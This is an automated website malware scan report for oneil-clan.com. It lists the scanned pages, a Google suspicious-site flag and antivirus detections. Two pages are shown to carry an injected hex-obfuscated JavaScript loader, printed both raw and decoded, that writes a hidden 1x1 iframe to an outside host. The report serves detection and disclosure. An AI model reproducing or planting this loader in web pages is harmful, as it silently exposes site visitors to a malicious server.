New scan:

Malware Scanner report for oneil-clan.com

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "oneil-clan.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=oneil-clan.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://oneil-clan.com/
200 OK
Content-Length: 14084
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f7365637572652e737461746973746963616e6f6d39312e636f6d2f696e2e7068703f746a3d64633963656435613135336263643264222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);

Decoded script:


document.write('<iframe src="http://secure.statisticanom91.com/in.php?tj=dc9ced5a153bcd2d" width="1" height="1" frameborder="0"></iframe>')
document.write('<iframe src="http://secure.statisticanom91.com/in.php?tj=dc9ced5a153bcd2d" width="1" height="1" frameborder="0"></iframe>')
<iframe src="http://secure.statisticanom91.com/in.php?tj=dc9ced5a153bcd2d" width="1" height="1" frameborder="0"></iframe>

Antivirus reports:

Microsoft
Exploit:HTML/IframeRef.gen
NANO-Antivirus
Trojan.Url.Iframe.bhqqv
F-Prot
IFrame.gen
Commtouch
IFrame.gen

http://oneil-clan.com/widgets/noieactivate.js
200 OK
Content-Length: 270
Content-Type: application/javascript
clean
http://oneil-clan.com/slideshow_flash.html
200 OK
Content-Length: 11186
Content-Type: text/html
clean
http://oneil-clan.com/index.html
200 OK
Content-Length: 14084
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f7365637572652e737461746973746963616e6f6d39312e636f6d2f696e2e7068703f746a3d64633963656435613135336263643264222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);

Decoded script:


document.write('<iframe src="http://secure.statisticanom91.com/in.php?tj=dc9ced5a153bcd2d" width="1" height="1" frameborder="0"></iframe>')
document.write('<iframe src="http://secure.statisticanom91.com/in.php?tj=dc9ced5a153bcd2d" width="1" height="1" frameborder="0"></iframe>')
<iframe src="http://secure.statisticanom91.com/in.php?tj=dc9ced5a153bcd2d" width="1" height="1" frameborder="0"></iframe>

Antivirus reports:

Microsoft
Exploit:HTML/IframeRef.gen
NANO-Antivirus
Trojan.Url.Iframe.bhqqv
F-Prot
IFrame.gen
Commtouch
IFrame.gen

http://oneil-clan.com/gtree.html
200 OK
Content-Length: 10197
Content-Type: text/html
clean
http://oneil-clan.com/icq.html
200 OK
Content-Length: 19440
Content-Type: text/html
clean
http://oneil-clan.com/masonry/widgets/simple/js/icq.js
404 Not Found
Content-Length: 11812
Content-Type: text/html
clean
http://code.jquery.com/jquery-1.9.1.js
200 OK
Content-Length: 268381
Content-Type: application/x-javascript
clean
http://oneil-clan.com/cgi-sys/js/simple-expand.min.js
200 OK
Content-Length: 2782
Content-Type: application/javascript
clean
http://oneil-clan.com/masonry/widgets/simple/js/
404 Not Found
Content-Length: 11812
Content-Type: text/html
clean
http://oneil-clan.com/test404page.js
404 Not Found
Content-Length: 11812
Content-Type: text/html
clean
http://oneil-clan.com/Fun.html
200 OK
Content-Length: 10798
Content-Type: text/html
clean
http://www.jokes2go.com/cgi-bin/randjs.cgi?type=G
200 OK
Content-Length: 282
Content-Type: text/html
clean
http://www.jokes2go.com/
200 OK
Content-Length: 22760
Content-Type: text/html
clean
http://www.jokes2go.com/js/commonfunctions.js
200 OK
Content-Length: 928
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: oneil-clan.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 20:22:44 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 14084
Content-Type: text/html
Last-Modified: Tue, 28 Dec 2010 14:02:51 GMT

...14084 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: oneil-clan.com
Referer: http://www.google.com/search?q=oneil-clan.com

Result:
The result is similar to the first query. There are no suspicious redirects found.